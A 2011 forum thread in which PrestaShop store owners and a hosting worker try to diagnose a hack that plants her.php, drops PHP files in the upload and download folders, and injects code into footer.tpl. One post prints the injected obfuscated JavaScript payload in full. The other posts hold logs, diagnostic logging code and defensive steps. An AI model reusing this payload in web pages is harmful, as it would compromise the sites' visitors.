Pieter Posted August 24, 2011 Share Posted August 24, 2011 Just checked my sites & my clients sites & it seems to be only 1.4.3 & 1.4.4 affected so far. One site is in maintenance mode & was still affected. I'm now going to try a clean install on wamp & see what the logs say after. Hi Infected as well, had to put the shop offline I'm on 1.4.2.5 can we have a progress report from the presta team? regards Pieter Link to comment Share on other sites More sharing options...
Kamel Boukhateb Posted August 24, 2011 Share Posted August 24, 2011 Hello, for those who can reproduce this bug in localhost, can you please remade an install, and before you do any action on your prestashop please add the following code : if ($_POST) { $fd = fopen(_PS_ROOT_DIR_.'/log_her.txt', 'a'); fwrite($fd, var_export($_POST, true).var_export($_SERVER, true)."\n"); fclose($fd); } bellow the code function __construct() { in file admin/tabs/adminModules.php. Once you have noticed the presence of her.php infection, please send me per MP the log file her_log.txt in your Prestashop root folder, thank you Can you please read the quote. If someone can do all this, it would grant us great help. Link to comment Share on other sites More sharing options...
armadillo Posted August 24, 2011 Share Posted August 24, 2011 Hi our website also heacked. Now i have to stoped acces to the website, can anybody say the clear solution? Link to comment Share on other sites More sharing options...
indus Posted August 24, 2011 Share Posted August 24, 2011 For anyone who finds a her.php file under their modules directory, you should do the following: - Check the file creation time, write this down and delete the file from your server. - Go to your apache raw access logs. You should be able to access it using hosting control panel. - Find the line that corresponds to the file creation time you wrote down earlier. - Copy the section starting 5 minutes before to 5 minutes after. Save it in a text file and share it here. This data would help identify the root of the problem. To see if you have been attacked, check the following: - Is there any php file under your uploads or downloads directory apart from index.php? - Is there a strange javascript at the end of your footer.tpl file? If any of the above happens, change your mysql username and password. I could not find the her.php file, but my footer.tpl surely had the strange javascript at the bottom.With some weird file in upload and download directories. Site is still up though,but the add to cart buttons didnt work properly and got a security cert warning from ssl pages showing a weird ssl certificate which was not mine. All slideshows have stopped working.Cannot order products because add to cart does not work anymore. Link to comment Share on other sites More sharing options...
istox Posted August 24, 2011 Share Posted August 24, 2011 Same php files in /download and /upload folder. Footer.tpl in theme folder changed. her.php in module folder not exist. Prestashop 1.4.3 Link to comment Share on other sites More sharing options...
SwiftEssentials Posted August 24, 2011 Share Posted August 24, 2011 I also got infected by js.Rediretor-IY Tjn yesterday. I'm running 1.4.4 shop but did not find the her.php file. I ran my page source and found this at the bottom.... "<script>String.prototype.asd=function(){return String.fromCharCode;};Object.prototype.asd="e";try{for(i in{})if(~i.indexOf('as'))throw 1;}catch(q){zxc={};} v=document.createTextNode('asd');var s="";for(i in v)if(i=='childNodes')o=v.length+1;o*=2;e=eval;m=[120-o,99-o,116- o,34-o,102-o,34-o,63-o,34-o,112-o,103-o,121-o,34-o,70-o,99-o,118-o,103-o,42-o,43-o,61-o,120-o,99-o,116-o,34-o,122-o,63- o,85-o,118-o,116-o,107-o,112-o,105-o,48-o,104-o,116-o,113-o,111-o,69-o,106-o,99-o,116-o,69-o,113-o,102-o,103-o,42-o,79- o,99-o,118-o,106-o,48-o,104-o,110-o,113-o,113-o,116-o,42-o,102-o,48-o,105-o,103-o,118-o,70-o,99-o,118-o,103-o,42-o,43- o,49-o,52-o,43-o,45-o,59-o,57-o,43-o,61-o,34-o,120-o,99-o,116-o,34-o,123-o,63-o,85-o,118-o,116-o,107-o,112-o,105-o,48- o,104-o,116-o,113-o,111-o,69-o,106-o,99-o,116-o,69-o,113-o,102-o,103-o,42-o,102-o,48-o,105-o,103-o,118-o,74-o,113-o,119 -o,116-o,117-o,42-o,43-o,45-o,59-o,57-o,43-o,61-o,102-o,113-o,101-o,119-o,111-o,103-o,112-o,118-o,48-o,121-o,116-o,107- o,118-o,103-o,42-o,36-o,62-o,107-o,104-o,116-o,99-o,111-o,103-o,34-o,117-o,116-o,101-o,63-o,41-o,106-o,118-o,118-o,114- o,60-o,49-o,49-o,101-o,110-o,107-o,101-o,109-o,111-o,103-o,36-o,45-o,122-o,45-o,123-o,45-o,36-o,48-o,104-o,107-o,110- o,103-o,99-o,120-o,103-o,48-o,101-o,113-o,111-o,41-o,34-o,121-o,107-o,102-o,118-o,106-o,63-o,50-o,34-o,106-o,103-o,107- o,105-o,106-o,118-o,63-o,50-o,64-o,36-o,43-o,61-o];mm=''.asd();for(i=0;i<m.length;i++)s+=mm(e("m"+"["+"i"+"]"));e (s);</script> <script>String.prototype.asd=function(){return String.fromCharCode;};Object.prototype.asd="e";try{for(i in{})if(~i.indexOf('as'))throw 1;}catch(q){zxc={};} v=document.createTextNode('asd');var s="";for(i in v)if(i=='childNodes')o=v.length+1;o*=2;e=eval;m=[120-o,99-o,116- o,34-o,102-o,34-o,63-o,34-o,112-o,103-o,121-o,34-o,70-o,99-o,118-o,103-o,42-o,43-o,61-o,120-o,99-o,116-o,34-o,122-o,63- o,85-o,118-o,116-o,107-o,112-o,105-o,48-o,104-o,116-o,113-o,111-o,69-o,106-o,99-o,116-o,69-o,113-o,102-o,103-o,42-o,79- o,99-o,118-o,106-o,48-o,104-o,110-o,113-o,113-o,116-o,42-o,102-o,48-o,105-o,103-o,118-o,70-o,99-o,118-o,103-o,42-o,43- o,49-o,52-o,43-o,45-o,59-o,57-o,43-o,61-o,34-o,120-o,99-o,116-o,34-o,123-o,63-o,85-o,118-o,116-o,107-o,112-o,105-o,48- o,104-o,116-o,113-o,111-o,69-o,106-o,99-o,116-o,69-o,113-o,102-o,103-o,42-o,102-o,48-o,105-o,103-o,118-o,74-o,113-o,119 -o,116-o,117-o,42-o,43-o,45-o,59-o,57-o,43-o,61-o,102-o,113-o,101-o,119-o,111-o,103-o,112-o,118-o,48-o,121-o,116-o,107- o,118-o,103-o,42-o,36-o,62-o,107-o,104-o,116-o,99-o,111-o,103-o,34-o,117-o,116-o,101-o,63-o,41-o,106-o,118-o,118-o,114- o,60-o,49-o,49-o,101-o,110-o,107-o,101-o,109-o,111-o,103-o,36-o,45-o,122-o,45-o,123-o,45-o,36-o,48-o,104-o,107-o,110- o,103-o,99-o,120-o,103-o,48-o,101-o,113-o,111-o,41-o,34-o,121-o,107-o,102-o,118-o,106-o,63-o,50-o,34-o,106-o,103-o,107- o,105-o,106-o,118-o,63-o,50-o,64-o,36-o,43-o,61-o];mm=''.asd();for(i=0;i<m.length;i++)s+=mm(e("m"+"["+"i"+"]"));e (s);</script></body>" my footer.tpl had the code in it. Also I had the strange files in upload and download which i've deleted and renamed the directories. I'm hoping that works. Is there any way to stop this from happening again? Link to comment Share on other sites More sharing options...
neller Posted August 24, 2011 Share Posted August 24, 2011 Hello, for those who can reproduce this bug in localhost, can you please remade an install, and before you do any action on your prestashop please add the following code : if ($_POST) { $fd = fopen(_PS_ROOT_DIR_.'/log_her.txt', 'a'); fwrite($fd, var_export($_POST, true).var_export($_SERVER, true)."\n"); fclose($fd); } bellow the code function __construct() { in file admin/tabs/adminModules.php. Once you have noticed the presence of her.php infection, please send me per MP the log file her_log.txt in your Prestashop root folder, thank you Reading all posts here, it seems the upload / download files and code in footer.tpl are being added when a password is keyed into the admin login on screen. I have an uninfected shop, footer.tlp is as it should be and upload / download only have index.php. Using this shop, I added the code above to the file, uploaded it. logged out of admin, checked upload / download and footer.tpl, all clean. relogged in typing the password. WHOA! upload / download have new files, footer.tpl has extra code but no sign of her.php in modules and no log_her.txt in root! This her.php is being created at a different time than everything else. I will search through the log files and post anything with her.php Hope this helps. Neller Link to comment Share on other sites More sharing options...
spott Posted August 24, 2011 Share Posted August 24, 2011 Just in case I made some "protection" to my site. My site was not affected - but newer knows. I changed the footer.tpl file permissions to 444 Also I made one her.php file to /modules folder with permissions 400 When attacker can still rewrite these files - then we have some problems with webserver Link to comment Share on other sites More sharing options...
istox Posted August 24, 2011 Share Posted August 24, 2011 I mentioned than I had the same code in footer.tpl like in post #84. download and upload folder renamed footer.tpl set permissions to 444. Link to comment Share on other sites More sharing options...
neller Posted August 24, 2011 Share Posted August 24, 2011 The only entry for her.php in logs was (url removed); blah-blah.com my.ip.add.ress - - [24/Aug/2011:11:25:56 +0100] "GET /modules/her.php HTTP/1.1" 200 - "http://blahblah.com/admin/" "Mozilla/5.0 (Windows NT 6.0; rv:6.0) Gecko/20100101 Firefox/6.0" Link to comment Share on other sites More sharing options...
sYs^ Posted August 24, 2011 Share Posted August 24, 2011 One of my stores (1.4.3) got hacked too, funny that the only request to her.php was from my ip address. Link to comment Share on other sites More sharing options...
indus Posted August 24, 2011 Share Posted August 24, 2011 I would like to add: All my slideshows stopped working now.Add to cart button animation dont work but product is still added to cart under checkout pages. Slideshows are third party modules: Vtem slideshow from the modules section on forums maofree new products slider jbx menu 2.7.1 edit:After setting force compile to 'yes' its working ok now. This exploit surely messed with the cache settings. Link to comment Share on other sites More sharing options...
aztecmedia Posted August 24, 2011 Share Posted August 24, 2011 Hi - I noticed the same issue this morning. First encountered it on the Store Finder page as the Google Map no longer worked. I checked the HTTP requests using Firebug and again noticed about 3 links to external sites (the one I can easily remember is jokelimo.com). So after reading this thread I discoved the new .php files in the Upload and Download folders and also a change to the footer.tpl file. There was no sign of the her.php as previously mentioned. So I've deleted the new .php files that were created and copied over my original footer.tpl file. In the hope of preventing anything more damaging from happening I've changed all FTP, database and employee passwords. I've also changed the permissions on the Upload and Download folders to read-only until a fix is released. From what we can gather it seems as though scripts have been uploaded to the Uplaod or Download folder which then generate the her.php file. This file must make changes to footer.tpl and then self-delete. Just a guess anyway as not as technically knowledgeable as others on here. Any updates on what the original cause may have been and when a fix might become available? I don't think upgrading to a new version would be an option as I've made a lot of changes to some of the core files. A much better fix would be if the root problem can be identified and we only have to replace 1 or 2 files. If this helps, this is the setup information: Prestashop Version: 1.4.2.5 Server information: Linux #1 SMP Wed Sep 29 12:50:31 EDT 2010 x86_64 Server software Version: Apache/2.2.3 (CentOS) Anyway, I hope this gets resolved soon. Thank you all for your helpful comments. Oliver Link to comment Share on other sites More sharing options...
istox Posted August 24, 2011 Share Posted August 24, 2011 May be someone has complex protective actions what to do before update will be done? Or problem will be resolved. I will search Russian forums for it. Link to comment Share on other sites More sharing options...
jesusruiz Posted August 24, 2011 Share Posted August 24, 2011 One question, the stores are alive and have not been affected. What precaution should be taken?. That is, what do?, changes to permissions to some files or directories?, Erase a file store for the hack can not be effective (index.php index.tpl footer.tpl etc ...)? Thanks. Link to comment Share on other sites More sharing options...
Takada Posted August 24, 2011 Share Posted August 24, 2011 People who gets their store stop working should try to enable smarty 3 in admin>preferences>lastoptionbox as the script delete the folder smarty_v2. Link to comment Share on other sites More sharing options...
ederntal Posted August 24, 2011 Share Posted August 24, 2011 I had the same things one hour ago… Link to comment Share on other sites More sharing options...
Xenocide Posted August 24, 2011 Share Posted August 24, 2011 This is one of my live site's that's been hacked. Hacker's IP was: 91.143.79.106 This is the access logs grepped for that IP: /themes/<mytheme>/footer.tpl was modified /download/ had a php file with a filename that looked like an md5 string /upload/ had a php file with a filename that looked like an md5 string /tools/smarty_v2 was deleted (Deleted whole folder) /tools/smarty was modified NO /modules/her.php Oh, to add the files that were created had a modified time of 04:31 <<<<REMOVED ATTACHMENT - XENOCIDE >>>> Link to comment Share on other sites More sharing options...
jesusruiz Posted August 24, 2011 Share Posted August 24, 2011 The shops are not affected, think is good idea do the following?: Rename some of the important files and also rename the folders that know that the virus changed. With other solutions, I think we're not sure. Because we do not know yet nothing of this virus/hack. Link to comment Share on other sites More sharing options...
Dom-T Posted August 24, 2011 Share Posted August 24, 2011 Edit: Ok a slight rethink, I've re-read the code at the top of the thread and it edits the footer.tpl itself via code it downloads. Therefore it must be the initial POST to the admin area which creates her.php. I work for a hosting company and have been trying to track this down. The her.php file is accessed via an ajax request and contains the code in the first page of this thread, which downloads the malicious files to upload/ and download/ then deletes the smarty folders and emails admin login data to the attacker. I can't find what creates her.php initially but in every instance I've seen, it immediately follows an admin login and a click of an admin tab button. Because it's done via ajax that implies the code in footer.tpl is the source, but I can't find how this is created [see my edit at top] To prevent the attack I've put in place an auto_prepend_file which simply does a mail() of $_SERVER then calls die() if it detects it's the her.php file which is being executed, but this is only stopping the effect rather than the cause. One theory I have is that it's a virus on the Prestashop administrator's PC. All attacks have a POST to /adminfolder/ajax.php, then on the next request for a tab her.php is subsequently called, for example: ip - - [24/Aug/2011:08:53:52 +0100] "POST /shop/admin123/ajax.php HTTP/1.1" 200 20 "http://www.site.net/shop/admin123/" ip - - [24/Aug/2011:08:53:53 +0100] "POST /shop/admin123/index.php?tab=AdminModules&token=a088c4e2726917d74b2635984e6af501 HTTP/1.1" 200 20085 "http://www.site.net/shop/admin123/" ip - - [24/Aug/2011:08:53:54 +0100] "GET /shop/modules/her.php HTTP/1.1" 200 20 "http://www.site.net/shop/admin123/" In terms of tracking down activity I'd possibly advise adding code which mails / logs the contents of $_POST and $_SERVER on every request to /adminfolder/index.php and /adminfolder/ajax.php as that should give a clue as to what's happening, but the niggle is it still doesn't explain how the content (which causes the malicious GET) was added to footer.tpl. Link to comment Share on other sites More sharing options...
ruilong Posted August 24, 2011 Share Posted August 24, 2011 This is one of my live site's that's been hacked. Hacker's IP was: 91.143.79.106 This is the access logs grepped for that IP: /themes/<mytheme>/footer.tpl was modified /download/ had a php file with a filename that looked like an md5 string /upload/ had a php file with a filename that looked like an md5 string /tools/smarty_v2 was deleted (Deleted whole folder) /tools/smarty was modified NO /modules/her.php Oh, to add the files that were created had a modified time of 04:31 Have you checked your IP? (myip.dk) Link to comment Share on other sites More sharing options...
SwiftEssentials Posted August 24, 2011 Share Posted August 24, 2011 Update---- I've now seen the her.php file created on my server (now deleted). I tried a different theme and it was all fine, so I'm going to try delete my old theme and do a fresh theme install. But don't think that will stop the hack from happening again? Link to comment Share on other sites More sharing options...
Recommended Posts